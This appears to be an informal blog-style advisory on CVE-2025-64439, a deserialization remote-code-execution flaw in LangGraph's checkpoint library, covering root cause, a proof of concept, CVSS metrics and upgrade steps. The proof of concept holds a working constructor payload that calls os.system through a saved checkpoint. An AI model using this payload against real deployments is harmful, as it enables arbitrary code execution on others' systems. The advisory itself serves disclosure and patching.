LangGraph 0.4.8 Security: Critical Vulnerability Alert!
Hey guys! So, there's a critical security alert for anyone using langgraph-0.4.8-py3-none-any.whl. A vulnerability, CVE-2025-64439, has been identified, and it's packing a serious punch with a severity score of 9.6. Let's dive into the details so you know what's up and how to protect your projects.
What's the Deal?
This vulnerability affects the langgraph_checkpoint-2.1.1-py3-none-any.whl library, which, as the name suggests, provides base interfaces for LangGraph checkpoint savers. Essentially, it's about how LangGraph saves its state. This particular version has a flaw in how it handles deserialization, potentially leading to remote code execution (RCE). Yeah, that's as bad as it sounds.
The Nitty-Gritty Details
- Vulnerable Library:
langgraph_checkpoint-2.1.1-py3-none-any.whl - Dependency Path: Your
requirements.txtfile pulls inlanggraph-0.4.8, which then depends on the vulnerable checkpoint library. - The Root Cause: The
JsonPlusSerializer, used for checkpointing, has an RCE vulnerability when deserializing payloads saved in "json" serialization mode. If someone can sneak in a malicious payload, it can execute arbitrary Python code when deserialized. Yikes! - Where's the Danger? The vulnerable code lives in
jsonplus.pywithin the LangGraph checkpoint library. The serializer defaults tomsgpack, but if that fails (e.g., due to illegal Unicode surrogate values), it falls back to "json" mode. And that's where the trouble begins.
Breaking it Down Even Further
The vulnerability arises from the constructor-style format for custom objects in the "json" mode. An attacker could craft a malicious payload that, when deserialized, executes arbitrary functions. This is like leaving the keys to your kingdom under the doormat!
To give you a clearer picture, here is the dependency hierarchy:
langgraph-0.4.8-py3-none-any.whl(Your Main Library)- :x:
langgraph_checkpoint-2.1.1-py3-none-any.whl(The Vulnerable Guy)
- :x:
Who's at Risk?
If you're using langgraph-checkpoint versions earlier than 3.0 and:
- Allow untrusted or user-supplied data to be persisted into checkpoints,
- Use the default serializer (or explicitly instantiate
JsonPlusSerializer) which may fall back to "json" mode.
Then, you're potentially vulnerable. If you only process trusted data or don't allow untrusted checkpoint writes, the risk is lower, but it's still a good idea to patch up.
Proof of Concept (PoC)
Here's a simplified PoC to illustrate the vulnerability:
from langgraph.graph import StateGraph
from typing import TypedDict
from langgraph.checkpoint.sqlite import SqliteSaver
class State(TypedDict):
foo: str
attack: dict
def my_node(state: State):
return {"foo": "oops i fetched a surrogate \ud800"}
with SqliteSaver.from_conn_string("foo.db") as saver:
graph = (
StateGraph(State)
.add_node("my_node", my_node)
.add_edge("start", "my_node")
.compile(checkpointer=saver)
)
attack = {
"lc": 2,
"type": "constructor",
"id": ["os", "system"],
"kwargs": {"command": "echo pwnd you > /tmp/pwnd.txt"},
}
malicious_payload = {
"attack": attack,
}
thread_id = "00000000-0000-0000-0000-000000000001"
config = {"thread_id": thread_id}
# Malicious payload is saved in the first call
graph.invoke(malicious_payload, config=config)
# Malicious payload is deserialized and code is executed in the second call
graph.invoke({"foo": "hi there"}, config=config)
Running this PoC writes a file /tmp/pwnd.txt to disk, demonstrating the remote code execution. Scary, right?
The Fix
The good news is that this vulnerability is fixed in langgraph-checkpoint==3.0.0. Upgrade immediately! This version is fully compatible with langgraph>=0.3 and doesn't require any code modifications.
You can find the release here: https://github.com/langchain-ai/langgraph/releases/tag/checkpoint%3D%3D3.0.0
What the Fix Does
The fix introduces an allow-list for constructor deserialization, restricting permissible id paths to explicitly approved module/class combinations. Also, saving payloads in "json" format has been deprecated to remove this unsafe fallback path.
Mitigation
- Upgrade to
langgraph-checkpoint==3.0.0ASAP! - If you're using
langgraph-api, update to version0.5or later, which will automatically require the patched version of the checkpointer library.
CVSS 3.x Metrics Breakdown
Let's break down that scary 9.6 CVSS score:
- Attack Vector: Network (Attack can be done over the network)
- Attack Complexity: Low (Easy to exploit)
- Privileges Required: Low (An attacker doesn't need high-level access)
- User Interaction: None (No user interaction required)
- Scope: Changed (An exploited vulnerability can affect resources beyond the security scope managed by the security authority)
- Confidentiality Impact: None (No impact to confidentiality)
- Integrity Impact: High (Data can be modified)
- Availability Impact: High (Service disruption)
This means an attacker can remotely, and easily, execute arbitrary code on your system with minimal privileges, potentially leading to complete system compromise. Not good!
Remediation
Because this is a transitive vulnerability, you might not see a direct fix available for langgraph-0.4.8. However, the key is to ensure that the langgraph_checkpoint dependency is updated to version 3.0.0 or later.
How to Update
-
Using pip:
pip install langgraph-checkpoint==3.0.0Make sure to update your
requirements.txtfile to reflect this change. -
Using Conda:
conda install -c conda-forge langgraph-checkpoint=3.0.0Again, update your environment file.
Stay Vigilant!
Security is an ongoing process. Keep your dependencies updated, and stay informed about potential vulnerabilities. A little bit of caution can save you a whole lot of trouble.
Final Thoughts
This vulnerability is a serious reminder to keep our dependencies up-to-date and to be cautious about the data we persist in checkpoints. Upgrade to langgraph-checkpoint==3.0.0 immediately to protect your applications. Stay safe out there!